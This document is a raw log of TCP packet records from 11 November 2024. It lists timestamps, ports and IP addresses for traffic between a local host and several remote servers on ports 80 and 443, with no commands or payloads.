Nov 11, 2024 01:14:03.187566042 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.187575102 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.187577963 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.187602997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.187603951 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.187611103 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.187614918 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.187634945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.187670946 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:04.709557056 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:04.709589005 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:04.709659100 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:04.709687948 CET	49735	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:04.709732056 CET	443	49735	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:04.709779024 CET	49735	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:04.709803104 CET	49736	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:04.709822893 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:04.709878922 CET	49736	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:04.709920883 CET	49737	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:04.709954023 CET	443	49737	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:04.710007906 CET	49737	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:04.710091114 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:04.710103989 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:04.710227013 CET	49735	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:04.710242987 CET	443	49735	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:04.710344076 CET	49736	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:04.710356951 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:04.710474014 CET	49737	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:04.710488081 CET	443	49737	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.558892012 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.559155941 CET	49736	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.559175014 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.560071945 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.560137987 CET	49736	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.560234070 CET	443	49735	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.560590029 CET	49735	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.560609102 CET	443	49735	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.560945988 CET	49736	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.561006069 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.561093092 CET	49736	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.561101913 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.561635017 CET	443	49735	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.561705112 CET	49735	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.562431097 CET	49735	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.562495947 CET	443	49735	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.562597990 CET	49735	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.562606096 CET	443	49735	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.565674067 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.565860033 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.565880060 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.566834927 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.566894054 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.567148924 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.567202091 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.567317009 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.586498022 CET	443	49737	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.586819887 CET	49737	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.586834908 CET	443	49737	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.587858915 CET	443	49737	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.587920904 CET	49737	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.588191032 CET	49737	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.588258028 CET	443	49737	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.588283062 CET	49737	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.607986927 CET	49736	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.608055115 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.608062029 CET	49735	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.608062983 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.631333113 CET	443	49737	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.639250994 CET	49737	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.639259100 CET	443	49737	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.654983044 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.686113119 CET	49737	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.827774048 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.827820063 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.827850103 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.828001976 CET	49736	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.828028917 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.828074932 CET	49736	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.828258038 CET	443	49735	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.829910040 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.830874920 CET	49736	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.830909967 CET	443	49736	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.830976009 CET	49736	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.846177101 CET	49735	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.846213102 CET	443	49735	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.846371889 CET	49735	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.855951071 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.855990887 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.856024981 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.856075048 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.856084108 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.856132030 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.856210947 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.856534958 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.860240936 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.860246897 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.864443064 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.865499020 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.865504980 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.870577097 CET	443	49737	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.916636944 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.916640043 CET	49737	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.916641951 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.916650057 CET	443	49737	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.918015957 CET	49737	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.918076038 CET	443	49737	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.918199062 CET	49737	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.962218046 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.974348068 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.974601984 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.974659920 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.974666119 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.976454973 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.976511002 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.976516962 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.980792046 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.982094049 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.982100010 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.989592075 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.989639044 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.989645004 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.998589993 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:05.998636961 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:05.998641968 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.007323980 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.007369995 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.007380009 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.016381025 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.016427994 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.016433001 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.024921894 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.024966002 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.024971008 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.032887936 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.032932997 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.032938957 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.072439909 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.072446108 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.093890905 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.093924046 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.093964100 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.093974113 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.093981981 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.094010115 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.095069885 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.095112085 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.095118999 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.095350027 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.095392942 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.095397949 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.099546909 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.099575043 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.099592924 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.099598885 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.099641085 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.100655079 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.107959032 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.108005047 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.108011007 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.113677025 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.113729000 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.113737106 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.119535923 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.119601965 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.119611979 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.125634909 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.125662088 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.125689030 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.125695944 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.125734091 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.131725073 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.131789923 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.132014036 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.132019043 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.138066053 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.138204098 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.138209105 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.144087076 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.144139051 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.144145012 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.150091887 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.150161028 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.150166035 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.156677008 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.156733036 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.156742096 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.162179947 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.162230968 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.162235975 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.168368101 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.170104027 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.170109034 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.174916029 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.178097010 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.178102016 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.201709986 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.201793909 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.201800108 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.212003946 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.212038040 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.212069035 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.212096930 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.212203979 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.212203979 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.212210894 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.212481022 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.212866068 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.213196993 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.213315964 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.213320017 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.213762999 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.213813066 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.213818073 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.215287924 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.215336084 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.215341091 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.220833063 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.220885992 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.220890999 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.226684093 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.226794004 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.226799011 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.229608059 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.229665995 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.229671955 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.233040094 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.233092070 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.233097076 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.237013102 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.237066031 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.237070084 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.239451885 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.239502907 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.239509106 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.242609024 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.242659092 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.242664099 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.246016979 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.246068001 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.246074915 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.249243975 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.249294996 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.249304056 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.291274071 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.291279078 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.291520119 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:06.291547060 CET	443	49734	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:06.291606903 CET	49734	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:07.926342964 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:07.926367998 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:07.926426888 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:07.926594019 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:07.926604033 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:08.190068007 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:08.190159082 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:08.714946032 CET	49747	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:08.714973927 CET	443	49747	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:08.715044975 CET	49747	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:08.715311050 CET	49747	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:08.715323925 CET	443	49747	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:08.776787996 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:08.776988029 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:08.777002096 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:08.778033972 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:08.778100967 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:08.778836012 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:08.778889894 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:08.779001951 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:08.779007912 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:08.826076031 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:08.938149929 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:08.938180923 CET	443	49748	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:08.938293934 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:08.938539028 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:08.938553095 CET	443	49748	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:09.024393082 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.024446964 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.024480104 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.024507046 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.024502993 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.024525881 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.024549961 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.024559975 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.024600029 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.024604082 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.031970024 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.032033920 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.032040119 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.072676897 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.072683096 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.119582891 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.140573025 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.140628099 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.140675068 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.140681982 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.143650055 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.143717051 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.143722057 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.147768021 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.147835970 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.147841930 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.156584024 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.156649113 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.156656027 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.165218115 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.165280104 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.165285110 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.174254894 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.174321890 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.174326897 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.183062077 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.183125019 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.183130026 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.191732883 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.191803932 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.191808939 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.203877926 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.203948975 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.203954935 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.244887114 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.244893074 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.257608891 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.257637978 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.257669926 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.257673025 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.257683992 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.257724047 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.260513067 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.260555983 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.260699034 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.260741949 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.260782003 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.260787010 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.264698982 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.264758110 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.264764071 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.267385960 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.267424107 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.267462015 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.267467976 CET	443	49745	172.217.18.14	192.168.2.4
